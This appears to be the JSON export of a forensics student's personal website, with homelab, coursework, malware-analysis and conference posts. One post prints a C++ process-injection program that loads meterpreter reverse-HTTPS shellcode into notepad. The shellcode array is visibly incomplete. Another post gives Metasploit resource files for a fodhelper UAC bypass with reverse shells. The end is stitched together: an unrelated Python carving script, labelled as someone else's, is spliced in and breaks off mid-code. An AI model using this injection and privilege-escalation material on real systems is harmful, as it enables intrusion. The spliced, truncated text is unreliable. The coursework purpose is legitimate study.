[{"content":"This is a test for automation. I am setting up a homelab documentation that automatically gets pushed. The repo is here. ","date":"28 May 2026","externalUrl":null,"permalink":"/projects/home-server/3/","section":"Projects","summary":"","title":"Automation","type":"projects"},{"content":"","date":"28 May 2026","externalUrl":null,"permalink":"/series/home-server/","section":"Series","summary":"","title":"Home Server","type":"series"},{"content":"","date":"28 May 2026","externalUrl":null,"permalink":"/tags/home-server/","section":"Tags","summary":"","title":"Home Server","type":"tags"},{"content":"","date":"28 May 2026","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":"","date":"28 May 2026","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":" ","date":"28 May 2026","externalUrl":null,"permalink":"/","section":"Welcome to my website!","summary":"","title":"Welcome to my website!","type":"page"},{"content":"","date":"28 April 2026","externalUrl":null,"permalink":"/classwork/","section":"Classwork","summary":"","title":"Classwork","type":"classwork"},{"content":"","date":"28 April 2026","externalUrl":null,"permalink":"/tags/css/","section":"Tags","summary":"","title":"CSS","type":"tags"},{"content":"This is my DFOR 772 (Advanced Artifact Extraction) final project, an ALEAPP Telegram Parser. The GitHub link is available here. The link to ALEAPP is here.\nI first used ALEAPP in the wonderful Jessica Hyde\u0026rsquo;s mobile forensics course in the Fall of 2025. Without her, I would not have done this project. 
Open Presentation ","date":"28 April 2026","externalUrl":null,"permalink":"/classwork/772-final/","section":"Classwork","summary":"","title":"DFOR 772 Final","type":"classwork"},{"content":"","date":"28 April 2026","externalUrl":null,"permalink":"/tags/fun/","section":"Tags","summary":"","title":"Fun","type":"tags"},{"content":"","date":"28 April 2026","externalUrl":null,"permalink":"/tags/html/","section":"Tags","summary":"","title":"HTML","type":"tags"},{"content":"","date":"28 April 2026","externalUrl":null,"permalink":"/tags/javascript/","section":"Tags","summary":"","title":"Javascript","type":"tags"},{"content":"","date":"26 March 2026","externalUrl":null,"permalink":"/tags/github/","section":"Tags","summary":"","title":"GitHub","type":"tags"},{"content":" Matrix rain, in a presentation. # I\u0026rsquo;m a huge fan of the Matrix movies. While working at the House, I wanted to make a presentation that had the Matrix\u0026rsquo;s \u0026lsquo;code rain\u0026rsquo; effect in the background. Perhaps this is possible with PowerPoint, but I do not have the knowledge, skills, or inclination to suffer through this task. That turned into a deep dive into learning Reveal.js. Reveal.js is a JavaScript framework that allows you to create a presentation in your browser.\nNeedless to say, it is significantly more customizable than PowerPoint. I used it to create a working proof of concept, available at this link. 
The GitHub repo for this project is here.\nBottom Line Up Front, here\u0026rsquo;s the demo video showcasing the modes of the presentation.\n","date":"26 March 2026","externalUrl":null,"permalink":"/misc/matrix-website/","section":"Miscellaneous","summary":"","title":"Matrix Website","type":"misc"},{"content":"","date":"26 March 2026","externalUrl":null,"permalink":"/misc/","section":"Miscellaneous","summary":"","title":"Miscellaneous","type":"misc"},{"content":"","date":"11 February 2026","externalUrl":null,"permalink":"/series/dfor-740-malware/","section":"Series","summary":"","title":"DFOR 740 Malware","type":"series"},{"content":" This article series is actively being worked on. Expect updates soon, specifically about Mythic C2, Cookie Stealers, and DLL search order hijacking. This was one of the coolest school assignments I\u0026rsquo;ve ever done. Background # The homework assignment was as follows:\nYour homework is to inject shellcode into a REMOTE PROCESS on your Windows VM, and catch the shell from Kali. You will need to utilize Windows 32 APIs to do this. You will need to submit the code you used to run this (NOTE DO NOT SUBMIT THE SHELLCODE IN YOUR CODE, AS AV MIGHT HAVE A FIT), as well as a video of yourself generating the shellcode on Kali, compiling the code + running the code on Windows, and catching your shell on your Kali virtual machine. Please also run a command on Kali to show you have command access on the Windows host.\nPlease narrate your video, explaining the steps you are taking, which API functions you used, and the commands you ran (and why you ran them).\nDemonstration # I made a video for some family members to show at a high level what the malware does. The link to that YouTube video is here.\nOutcome # I was able to compile a C++ executable that, when launched, spawned a notepad process, injected malicious code, and created a reverse connection back to my Kali Linux box. 
Importantly, this malware is very simple, and would be quickly flagged by most modern EDR solutions due to the EXECUTE_READWRITE memory permissions. A way I could potentially get around that is by first allocating the memory as read and write only, adding my payload, and then changing it to read and execute only.\nOnce the reverse shell was connected, I used it to take screenshots of the victim machine\u0026rsquo;s desktop, edit files and add persistence.\nProject Code # The code, available here, is: #include \u0026lt;Windows.h\u0026gt; #include \u0026lt;cstdio\u0026gt; //this is the main function, and it is able to take any number of arguments. the arguments will be put into the array argv int main(int argc, char* argv[]) { /* this shellcode is the malicious C code created by msfvenom on kali with the options: -p windows/x64/meterpreter/reverse_https LPORT=443 LHOST=192.168.188.129 -f c */ unsigned char shellcode[893] = \u0026#34;\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xcc\\x00\\x00\\x00\\x41\\x51\\x41\\x50\u0026#34; \u0026#34;\\x52\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\u0026#34; \u0026#34;\\x8b\\x52\\x20\\x51\\x56\\x48\\x8b\\x72\\x50\\x4d\\x31\\xc9\\x48\\x0f\u0026#34; \u0026#34;\\xb7\\x4a\\x4a\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\u0026#34; \u0026#34;\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\u0026#34; \u0026#34;\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x0f\u0026#34; \u0026#34;\\x85\\x72\\x00\\x00\\x00\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\u0026#34; \u0026#34;\\x74\\x67\\x48\\x01\\xd0\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x50\\x49\u0026#34; \u0026#34;\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x4d\\x31\\xc9\\x41\\x8b\\x34\\x88\u0026#34; \u0026#34;\\x48\\x01\\xd6\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\u0026#34; \u0026#34;\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\u0026#34; 
\u0026#34;\\xff\\xd5\\x48\\x83\\xc4\\x20\\x85\\xc0\\x74\\xb2\\x66\\x8b\\x07\\x48\u0026#34; \u0026#34;\\x01\\xc3\\x85\\xc0\\x75\\xd2\\x58\\xc3\\x58\\x6a\\x00\\x59\\x49\\xc7\u0026#34; \u0026#34;\\xc2\\xf0\\xb5\\xa2\\x56\\xff\\xd5\u0026#34;; //this is basically creating the variables that we will use HANDLE processHandle; HANDLE remoteThread; PVOID remoteBuffer; /* This is the old code from the example, it takes the PID to inject to as an argument and prints out the PID. printf(\u0026#34;Injecting to PID: %i\u0026#34;, atoi(argv[1])); processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1]))); */ //creates a notepad.exe process, passes in startup info and outputs process info STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(L\u0026#34;C:\\\\Windows\\\\System32\\\\notepad.exe\u0026#34;, NULL, NULL, NULL, FALSE, 0, NULL, NULL, \u0026amp;si,\u0026amp; pi); wprintf(L\u0026#34;PID of injected Notepad: %lu\\n\u0026#34;, pi.dwProcessId); //handle of created process is available at pi.hProcess remoteBuffer = VirtualAllocEx(pi.hProcess, NULL, sizeof shellcode,(MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); WriteProcessMemory(pi.hProcess, remoteBuffer, shellcode, sizeof shellcode,NULL); remoteThread = CreateRemoteThread(pi.hProcess, NULL, 0,(LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return 0; } Code Template # The template for this assignment was ired.team\u0026rsquo;s post about this.\n","date":"11 February 2026","externalUrl":null,"permalink":"/classwork/metasploitable-c2/","section":"Classwork","summary":"","title":"Metasploitable C2","type":"classwork"},{"content":"","date":"11 February 2026","externalUrl":null,"permalink":"/tags/red-teaming/","section":"Tags","summary":"","title":"Red Teaming","type":"tags"},{"content":"From January 24th to January 25th, I was part of the inaugural group of student scholars at DistrictCon, a DC-based hacker conference. 
While there, I spoke with vendors, hackers, and other students.\nI\u0026rsquo;d like to extend my heartfelt appreciation and gratitude to all the organizers who made this event and the student sponsorship happen. In particular, I\u0026rsquo;d like to shout out Sarah P. for being so flexible with the arrangements and so invested in making sure each student got something out of it.\nIt was the first ever hacker conference I\u0026rsquo;ve been to. I participated in a really cool badge challenge made by Jeff, AKA BigTaro. His site (and a GIF of the badge in action) is available here.\nThe Talks # The Badge # The Weather # ","date":"25 January 2026","externalUrl":null,"permalink":"/networking-events/districtcon/","section":"Networking Events","summary":"","title":"DistrictCon 1.0","type":"networking-events"},{"content":"","date":"25 January 2026","externalUrl":null,"permalink":"/tags/hacker-conference/","section":"Tags","summary":"","title":"Hacker Conference","type":"tags"},{"content":"","date":"25 January 2026","externalUrl":null,"permalink":"/networking-events/","section":"Networking Events","summary":"","title":"Networking Events","type":"networking-events"},{"content":" Together with my friend Liam from Lusky.dev, I performed a static and dynamic analysis of 2 malicious binaries. This analysis was part of DFOR 761, the malware reverse engineering class at GMU.\nExecutive Summary # We determined that malware sample #1 was a Trojan Dropper, which is a piece of malware that attackers use to deploy and execute further malware. This sample would constantly beacon out to a .biz domain in order to pull down additional malware or instructions. Malware sample #2 was determined to be an infostealer, specifically a keylogger that also recorded screenshots of the victim\u0026rsquo;s computer once per second. 
We believe that this malware would then attempt to send the resulting screenshots and logged keys to the attacker, although we were not able to determine the destination or mechanism for this functionality.\nAnalysis Techniques Utilized # The following programs were used to conduct the analyses of the malware: Process Monitor (ProcMon), 010 Editor, Cutter, RegShot, ProcDot, and INetSim. The general analytic process followed this workflow: First, we took snapshots of the registry using RegShot and then took a snapshot of the Virtual Machine prior to malware execution. Simultaneously, another VM with INetSim running was placed into a virtual network with the malware analysis VM. After this, ProcMon was loaded up in capture mode, and the malware was executed. The ProcMon logs were analyzed, converted into CSV, and passed into ProcDot for visual and timeline analysis. A second registry snapshot was taken and compared to the first. During our analysis, we separately conducted static analysis on our REMnux virtual machine using Cutter, the peframe tool, and 010 Editor.\nTechnical Analysis of Malware 2 # Dynamic Analysis # We began this analysis by performing a dynamic analysis of the binary. Upon initially running the malware, no activity was observed. As we later discovered, due to this malware\u0026rsquo;s age, it has to be run as an administrator. After running the malware as administrator, we discovered with Process Monitor that the malware created the following files: A screenshot of Process Monitor showing the malware executable creating files. A screenshot of files created by the malware. Notably, the DPBJ.009 file is significantly larger than the other files in this directory.\nWe also observed the malware2.exe process with PID 2500 spawning a process named DPBJ.exe with a PID of 4188. 
A screenshot of the malware creating a new process Within a few minutes of running the malware, the directory located at C:\\Windows\\SysWOW64\\28463\\ looked as it did below. Each of the photos in the preview shown below is a screenshot of the desktop of the VM, taken at one-second intervals. The folder \\28463 filling up with screenshots. Interestingly, on a schedule that appeared to be about once a minute, the screenshots of the desktop in this folder all appeared to disappear, and the DPBJ.009 file would increase in size. This led us to suspect that the photos were being embedded inside that file. As shown below, carving of that file revealed the JPEG start and end markers (FF D8 at the beginning of a file and FF D9 at the end of a file). Using HxD, we were able to successfully carve a screenshot from that file, confirming our suspicions. A screenshot of the beginning of a JPEG file carved from DPBJ.009 A screenshot of a JPEG file ending indicator, carved from DPBJ.009 Using INetSim, we were able to detect a DNS request for smtp.mail.yahoo.com, which is the only DNS request or network traffic we detected from the malware. I imagine that the malware has the ability to send its screenshots and captured keystrokes, and this is the mechanism the malware would use to accomplish that. If we had more time for this assignment, I would\u0026rsquo;ve searched for hardcoded email credentials and used a disassembler to look through the section of this malware that has this SMTP address. A screenshot of DNS traffic from the malware. A screenshot of the registry key that creates persistence. A screenshot from Process Monitor of the malware setting the autorun registry key. Note: The “AutoRuns” program from the SysInternals suite was also utilized and was not able to find any startup or persistence activity of the malware, which was unexpected. 
We believe that this is due to the \\Run key being located in the WOW6432Node registry location, which predates the creation of the Autoruns program.\nWe also utilized ProcDot to create an execution timeline, but I personally did not get much value from this program. It was finicky to set up, and by the time we got the program working, we already had a solid understanding of what the malware did. Perhaps with a more complicated malware sample, or after having the program set up correctly, it would provide more value. Nevertheless, I have included the screenshot of the ProcDot graph in this writeup. The text is illegible because zooming out in ProcDot (necessary to capture the entire image) reduces the text size. A screenshot of ProcDot\u0026rsquo;s execution graph. Static Analysis # We used 010 Editor to get strings from @D607.tmp, created by malware2.exe and located in the C:\\Users\\USER\\AppData\\Local\\Temp directory. This analysis revealed several mentions of the Ardamax Keylogger. OSINT of this software gave us the understanding that this was originally legitimate software that was later hijacked by threat actors. A screenshot of strings from the keylogger file. This keylogger also had a license file, with the contents shown below. The file this key was located in was the key.bin file. It is unclear if this registration is tied to the specific threat actor, or a commonly shared license file distributed with the keylogger. This is another area of this investigation in which I would have spent more time. A screenshot of the keylogger license file. Using the malware\u0026rsquo;s SHA-256 hash of 041411c41e5bbca3760e3cd7f9fb7f8e2fb14973bc8178bf056c3694baf9da04, we were able to find its detections on VirusTotal. A screenshot of VirusTotal detections for the malicious file. 
","date":"8 December 2025","externalUrl":null,"permalink":"/classwork/keylogger-malware/","section":"Classwork","summary":"","title":"Keylogger Malware","type":"classwork"},{"content":"","date":"8 December 2025","externalUrl":null,"permalink":"/tags/malware/","section":"Tags","summary":"","title":"Malware","type":"tags"},{"content":"","date":"8 December 2025","externalUrl":null,"permalink":"/tags/reverse-engineering/","section":"Tags","summary":"","title":"Reverse Engineering","type":"tags"},{"content":" This article series is actively being worked on. Expect updates soon, specifically about Mythic C2, Cookie Stealers, and DLL search order hijacking. What is FODhelper? # FODHelper is a Windows program that allows execution at a higher system integrity level. In other words, this native Windows program (a LOLbin) can be used to execute commands as SYSTEM on a Windows PC. This is bad. Very bad.\nHow can it be used? # Metasploit has a built-in module for fodhelper. I was tired of typing in my Metasploit options every time, so I created 2 \u0026ldquo;resource\u0026rdquo; files. For those who don\u0026rsquo;t know, they\u0026rsquo;re basically environment variable files for Metasploit. The ones I used are below.\nFODSetup.rc # use exploit/windows/local/bypassuac_fodhelper set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.188.129 set LPORT 444 set TARGET 0 MultiSetup.rc # use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_https set LHOST 192.168.188.129 set LPORT 443 What was I able to do with this? # This is an extension of my previous article in the series. The additional functionality is that I can now run as SYSTEM instead of the user. What this means is I can do things on the system that might be invisible to the user, such as activating/deactivating EDR functions, installing my own drivers or minifilters, or modifying system partitions.\nHow can you detect this? 
# I don\u0026rsquo;t go into depth in the video, but I used sysmon to detect this execution. This is not a great way to detect it, as it requires advance knowledge of the malware and my detection was only based on the command line name. Future work here would be focused on more behavioral-based detections.\nReferences # https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\n","date":"13 October 2025","externalUrl":null,"permalink":"/classwork/fodhelper/","section":"Classwork","summary":"","title":"Bypassing User Account Control with FodHelper","type":"classwork"},{"content":" Forensics OSINT Sandboxes Tools \u0026amp; Misc. Red Teaming Stark 4n6 Joshua Hickman\u0026rsquo;s Site SANS Eric Zimmerman\u0026rsquo;s Tools Guide SANS DFIR Fundementals SANS Enterprise Cloud Forensics Primer SANS Regex and Text parsing cheat sheet This Cyberchef recipe is very useful for hex decoding. Operating Systems # SANS SIFT workstation Evanole VM Remnux Memory # SANS Memory Forensics Cheat Sheet SANS Memory Forensics Malware Analysis # SANS Malware Analysis Cheat Sheet OS Forensics # SANS Third Party Windows Apps Forensics SANS Android Third Party Apps Forensics SANS Smartphone Forensics SANS Windows Forensics Cheat Sheet Network Forensics # SANS Network Forensics Poster An interesting OSINT concept using favicon hashes. SSLabs AbuseIPDB DomainToolsS VirusTotal Hybrid Analysis Palo Alto URLScan Cisco Talos Browserling Joe Sandbox Explain Shell SANS SQLite Cheat Sheet CyberChef File Signature Search Wikipedia File Signature List Let Me Google That For You (LMGTF) for when someone asks a dumb question.. Atomic Red Team Ransomware chats Table Generator Awesome Red Teaming Red Team Notes LOOBins (LOLBins for macOS) ","date":"13 October 2025","externalUrl":null,"permalink":"/misc/random-sites/","section":"Miscellaneous","summary":"","title":"Random Useful Websites","type":"misc"},{"content":"Well, I\u0026rsquo;ve officially caught the mini rack bug. 
You might be wondering, what is a mini rack?\nA mini rack is a miniaturized version of what most people think of when they picture a server rack. An example of both is shown below.\nA full size 19 inch server rack, probably about 40U tall? This is what I\u0026rsquo;m planning on making! # A 3D printed mini 10 inch server rack. This one is 6U I\u0026rsquo;ve never 3D printed before, but my younger brother just gifted me his old Creality Ender 3 Pro, so I\u0026rsquo;ll be using that (if I can figure out how to cut the longer pieces of the frame to fit on the bed.) This should be printed out of PETG for the heat resistance, so I also want to figure out some kind of enclosure and air purification solution for the VOCs before I print. The reason why I want to 3D print it is both for cost and for the learning experience. I am going with a 10 inch rack because it fits the components I have better than a 19 inch one.\nOne of the challenges I am having is that my homelab doesn\u0026rsquo;t have any more SATA ports or PCIe slots, so I\u0026rsquo;m not sure how I\u0026rsquo;ll be able to add more drive capacity to it. I really wanted to do a drive caddy like this: I have yet to figure out a way to connect those to my system. I was considering possibly a USB-to-SATA bridge, to emulate my own version of an HDD enclosure. Unfortunately, I will probably have to get some kind of SFF power supply for the hard drives (and a fan) but that\u0026rsquo;s a problem for the future. 
If I can\u0026rsquo;t figure that out, I will probably get something like this enclosure.\nSome other components I am considering buying/printing:\nPSU for the rack Brush cable panel Rack mount for PC Lab Rax system More to come on this page soon!\n","date":"12 October 2025","externalUrl":null,"permalink":"/projects/home-server/2/","section":"Projects","summary":"","title":"The next evolution","type":"projects"},{"content":"","date":"11 October 2025","externalUrl":null,"permalink":"/certifications/","section":"Certifications","summary":"","title":"Certifications","type":"certifications"},{"content":" Passing Security+ - What Worked for Me # I\u0026rsquo;m excited to share that I passed the CompTIA Security+ exam on my first try! This has been a key milestone on my path into cybersecurity, and I wanted to take a moment to reflect on how I got here and what\u0026rsquo;s next.\nI chose to take this test because it is a baseline requirement for a lot of jobs in cybersecurity. Truthfully, I should\u0026rsquo;ve taken this test much sooner than I did, but I wanted a solid base in cybersecurity first. Some of the topics I had to get familiar with were:\nThreat detection \u0026amp; attack vectors Risk Mitigation Secure network and application architecture Access controls Identity and access management Incident response Security+ covers all of that, and much more. It also serves as a prerequisite for more specialized certifications like CySA+, which is next on my list.\nHow I studied: # I studied part-time while working my internship, using a mix of video lectures, flashcards, practice exams, and hands-on labs. Here\u0026rsquo;s what worked best:\nProfessor Messer\u0026rsquo;s YouTube series Professor Messer\u0026rsquo;s exam notes and practice exams Exam Compass Practice Tests Anki Flashcards - these were mostly useful for ports, acronyms, and encryption algorithms. My homelab - I practiced creating firewall rules, sniffing packets, and running vulnerability scans. 
It was a really challenging test! My strategy was to give all the questions a good first answer (spending not more than ~2 minutes on each) and to flag the questions I wasn\u0026rsquo;t sure about. The PBQs were easily the hardest part of the test. I think that was one area that the practice material didn\u0026rsquo;t really cover well enough, so I felt slightly underprepared upon seeing those questions. Each of the PBQs took me the better part of 15 minutes on average. If I could go back, I would spend more time practicing with the simulations, especially under time pressure. The simulations test your ability under pressure just as much as they test your practical understanding.\nCheck the status of my certificate! # Final thoughts # If you\u0026rsquo;re considering taking the Security+, go for it. You don\u0026rsquo;t have to be an expert - just curious, consistent, and willing to learn.\nFeel free to reach out if you\u0026rsquo;re prepping for the exam. I\u0026rsquo;m happy to share tips or cheer you on!\n","date":"11 October 2025","externalUrl":null,"permalink":"/certifications/security-plus/","section":"Certifications","summary":"","title":"Security+","type":"certifications"},{"content":" I\u0026rsquo;m writing myself a cheat sheet for various Unix/DOS commands # This is mostly for me, but you might get value too.\nCtrl-L clears the screen in bash. which - location of an executable. strings - sudo find / -name \u0026ldquo;.\u0026rdquo; Nano section # ","date":"21 September 2025","externalUrl":null,"permalink":"/misc/cheat-sheet/","section":"Miscellaneous","summary":"","title":"Cheat Sheet","type":"misc"},{"content":"","date":"21 September 2025","externalUrl":null,"permalink":"/tags/guide/","section":"Tags","summary":"","title":"Guide","type":"tags"},{"content":" I\u0026rsquo;m still in the process of turning this into a proper series. 
# ","date":"21 September 2025","externalUrl":null,"permalink":"/projects/hugo-site/","section":"Projects","summary":"","title":"Hugo Site","type":"projects"},{"content":"No man ever steps in the same river twice, for it is not the same river and it is not the same man.\n-Heraclitus\nThe meaning of life is just to be alive. It is so plain and so obvious and so simple. And yet, everybody rushes around in a great panic as if it were necessary to achieve something beyond themselves.\n-Alan Watts\nThe best time to plant a cherry tree was 20 years ago. The second best time is now.\n-Unknown\n","date":"21 September 2025","externalUrl":null,"permalink":"/misc/quotes/","section":"Miscellaneous","summary":"","title":"Meaningful Quotes","type":"misc"},{"content":"While testing out some executables in my REMnux VM, I noticed that there was a typo in an error message of the program named xxxswf. I wanted to locate the source of that erroneously spelled message, so the following were my steps to locate it.\nFirst, I ran which to see where it was installed. Then, I ran strings against it to see what text was inside the executable. I saw it was a Python executable, so I ran a find command on my entire system to locate the Python file. Then, I simply ran strings on the Python file and used grep to find the erroneous lines!\n","date":"2 September 2025","externalUrl":null,"permalink":"/misc/software-error-message/","section":"Miscellaneous","summary":"","title":"Software Error Message","type":"misc"},{"content":" Placeholder content until after day 1\nI recently had the pleasure of attending the NDIA conference at the Walter Washington Convention Center in DC. 
The emerging technology conference takes place once a year, and hosts breakout sessions, tech demonstrations, networking, and keynote speakers.\n","date":"24 August 2025","externalUrl":null,"permalink":"/networking-events/ndia/","section":"Networking Events","summary":"","title":"NDIA Expo","type":"networking-events"},{"content":"","date":"24 August 2025","externalUrl":null,"permalink":"/tags/networking/","section":"Tags","summary":"","title":"Networking","type":"tags"},{"content":"","date":"21 August 2025","externalUrl":null,"permalink":"/tags/cms/","section":"Tags","summary":"","title":"CMS","type":"tags"},{"content":"","date":"21 August 2025","externalUrl":null,"permalink":"/tags/hugo/","section":"Tags","summary":"","title":"Hugo","type":"tags"},{"content":" Content # Finally, I\u0026rsquo;ve set up my new website. The learning curve was (and is !) very steep. First, I had to find a tech stack that worked for me. In 2025, with many options to choose from, it was slightly overwhelming. What I was looking for was something cheaper, leaner, and less prone to cybersecurity incidents than the previous WordPress installation I had. I tried out various static site generator stacks, such as Jekyll and Gatsby.\nInitially, I had been somewhat insistent on the idea of a GUI-based webpage editor, as I wanted to replicate the familiar and comfortable experience that I\u0026rsquo;d had with WordPress. An area of high concern for me was media uploads. Dragging and dropping seemed so easy! While my current setup lacks the GUI editor (maybe not for long..), I have found that a markdown-based SSG setup is ideal for my needs and actually quite comfortable once one is familiar with the build process.\nSetting up the site for the first time was somewhat painful due to the Git learning curve. I\u0026rsquo;ve still not gotten as comfortable with it as I\u0026rsquo;d like, but it was just a matter of time before I was in a situation that I had to learn it - better late than never. 
I\u0026rsquo;ve also greatly enjoyed the experience of getting to completely customize the HTML and CSS of my site.\nAlthough it is probably something few visitors will spend time reading, I dumped hours into making my resume automatic. I have a Google Doc for my resume that lets me modify or view it from any of the devices I own. I wanted the resume to auto-update on my website so I didn\u0026rsquo;t have to remember to do it. I also wanted private information such as my phone number, email, and zip code to be redacted. The way I ended up doing all of this is with a separate GitHub repository: when a new push is sent to my regular blog repo, a fresh copy of my resume is downloaded, compared against the stored one, and replaced if it does not match. Then a bit of Python magic redacts the sensitive text, and voila! It disappears!\nResources I used # ","date":"21 August 2025","externalUrl":null,"permalink":"/projects/hugo-site/migration/","section":"Projects","summary":"","title":"Setting up my website","type":"projects"},{"content":"","date":"20 August 2025","externalUrl":null,"permalink":"/tags/classwork/","section":"Tags","summary":"","title":"Classwork","type":"tags"},{"content":"In Fall 2024, I was enrolled in two Master's-level digital forensics classes: DFOR 660 and DFOR 510. DFOR 660 is all about what evidence can be extracted from a network, and how you actually accomplish that. DFOR 510 covers the basics of digital forensics. 
We cover a wide range of topics, such as write-blocking, forensic sanitizing, chain of custody, legal precedent and processes, memory forensics, and much more.\nIn DFOR 510, the required programs are: FTK Imager, a forensic imaging and evidence-preview tool; PyCharm Community Edition, for writing Python; Redline, an endpoint security tool that performs memory and file analysis for Indicators of Compromise (IOCs); and HxD, a hex editor for inspecting the low-level data on a storage medium such as flash storage or a hard drive.\nFall 2024: DFOR 660, Network Forensics; DFOR 510, Digital Forensics Analysis\nSpring 2025: DFOR 661, Digital Media Forensics; DFOR 664, Incident Response Forensics\nFall 2025: DFOR 710, Fraud Analytics; DFOR 670, Mobile Device Forensics; DFOR 761, Malware Reverse Engineering\nSpring 2026: DFOR 767, Penetration Testing in Digital Forensics; DFOR 772, Forensic Artifact Extraction; DFOR 790, Advanced Digital Forensics ","date":"20 August 2025","externalUrl":null,"permalink":"/classwork/digital-forensics-classes/","section":"Classwork","summary":"","title":"Digital Forensics Classes","type":"classwork"},{"content":"A few weeks ago, I had the pleasure of performing a lab in my network forensics class dealing with the collection of network traffic through the use of a layer 1 hub. For anyone unsure what that might look like, here is a photo of a unit comparable to the one I used in the lab:\nA Netgear ethernet hub What separates this hub from the modern switches of today is that while switches forward traffic based on MAC addresses, a hub does not. It simply repeats every frame out of all of its other ports. This was used in networks of old to create hub-and-spoke networks, but of course it has the unintended side effect of allowing other machines on your network to record traffic meant for a different computer. On the right side of the hub, you see a button labeled normal/uplink. 
This has the effect of allowing the rightmost port of the hub to connect two similar devices, performing the function of a crossover cable.\nThis is a network diagram of the typical classroom wiring at GMU. The goal of the lab was to intercept the network traffic of the target computer and to demonstrate this with a Wireshark packet capture showing Layer 3 traffic carrying the IP address of the target computer. I plugged the collection computer into the uplink port with uplink mode enabled, and plugged the target computer into one of the other ports. In Wireshark I could see the IP of the target computer, the websites the target was visiting (via the dns display filter), and the contents of its unencrypted HTTP traffic.\nThis is what the network looked like once I had connected the hub. This lab was a really cool look at practical packet capture and helped me understand the practicality of an old-school hub for network capture, although the approach has a number of shortcomings (namely the need for a wired connection, the 100 Mbps bandwidth limit, and the fact that a hub only works at half duplex). Overall, I really enjoyed this lab and cannot wait for the next one.\n","date":"5 November 2024","externalUrl":null,"permalink":"/classwork/network-capture-lab/","section":"Classwork","summary":"","title":"Network Capture Lab","type":"classwork"},{"content":"My mom had an old flip phone that she wanted the pictures recovered from. As best I could tell from trying to boot the phone, it was dead. No matter, FTK Imager to the rescue!\nI wrote a small Python script that looked for pictures in 3 formats: JPEG/JPG, PNG, and GIF. It went through the disk image byte by byte (the image itself being a bit-for-bit copy of the phone\u0026rsquo;s memory) looking for the magic numbers indicative of a picture. 
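As an added example (this is not the author's script): a small Python carver for the three formats above. It locates candidate files by their magic numbers, then walks each format's own structure to find where the file really ends, so an EXIF thumbnail (a complete JPEG embedded inside the photo's APP1 segment, with its own FFD8/FFD9 markers) is skipped rather than mistaken for the end of the photo. The naive first-FFD9 approach is kept alongside for comparison. The disk image it runs on is constructed inline from hand-built headers so that it runs offline; the embedded files are structurally valid but not viewable pictures.

```python
# Added example (not the author's script): carve JPEG/PNG/GIF files out of a raw
# image by magic number, then walk each format's structure to find the true end.

JPEG_SOI = bytes.fromhex('ffd8ff')           # SOI marker plus the 0xFF that opens the next marker
JPEG_EOI = bytes.fromhex('ffd9')             # EOI marker
PNG_SIG = bytes.fromhex('89504e470d0a1a0a')

def naive_jpeg_end(data, start):
    '''The first-FFD9 approach: truncates any JPEG that carries an embedded thumbnail.'''
    eoi = data.find(JPEG_EOI, start)
    return None if eoi == -1 else eoi + 2

def jpeg_end(data, start):
    '''Offset just past the EOI of the JPEG at start, or None if it is truncated.

    Marker segments are skipped by their declared length, so an EXIF thumbnail (a
    whole JPEG inside the APP1 segment, with its own FFD8/FFD9) is never mistaken
    for the end of the photo. In entropy-coded data a 0xFF is always followed by
    0x00 (byte stuffing) or an RSTn marker, so any other 0xFF xx is a real marker.
    '''
    pos, n = start + 2, len(data)                # skip SOI
    while pos + 1 < n:
        if data[pos] != 0xFF:
            return None                          # lost marker sync
        marker = data[pos + 1]
        if marker == 0xD9:
            return pos + 2                       # EOI
        if marker == 0xFF:
            pos += 1                             # fill byte before a marker
            continue
        if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
            pos += 2                             # standalone markers carry no length
            continue
        if pos + 4 > n:
            return None
        pos += 2 + int.from_bytes(data[pos + 2:pos + 4], 'big')
        if marker == 0xDA:                       # SOS: scan entropy-coded data for the next marker
            while pos + 1 < n:
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return None

def png_end(data, start):
    '''Walk PNG chunks (length, type, data, CRC) until IEND.'''
    pos, n = start + 8, len(data)
    while pos + 8 <= n:
        length = int.from_bytes(data[pos:pos + 4], 'big')
        ctype = data[pos + 4:pos + 8]
        pos += 12 + length
        if ctype == b'IEND':
            return pos if pos <= n else None
    return None

def _skip_subblocks(data, pos):
    '''Skip a chain of GIF data sub-blocks; return the offset after the 0x00 terminator.'''
    while pos < len(data):
        size = data[pos]
        pos += 1 + size
        if size == 0:
            return pos
    return None

def gif_end(data, start):
    '''Walk GIF blocks (extensions and image descriptors) until the 0x3B trailer.'''
    flags = data[start + 10]                     # logical screen descriptor packed field
    pos = start + 13
    if flags & 0x80:
        pos += 3 * 2 ** ((flags & 7) + 1)        # global colour table
    while pos is not None and pos < len(data):
        block = data[pos]
        if block == 0x3B:
            return pos + 1                       # trailer
        if block == 0x21:                        # extension: label byte, then sub-blocks
            pos = _skip_subblocks(data, pos + 2)
        elif block == 0x2C:                      # image descriptor: 9 bytes follow 0x2C
            lflags = data[pos + 9]
            pos += 10
            if lflags & 0x80:
                pos += 3 * 2 ** ((lflags & 7) + 1)   # local colour table
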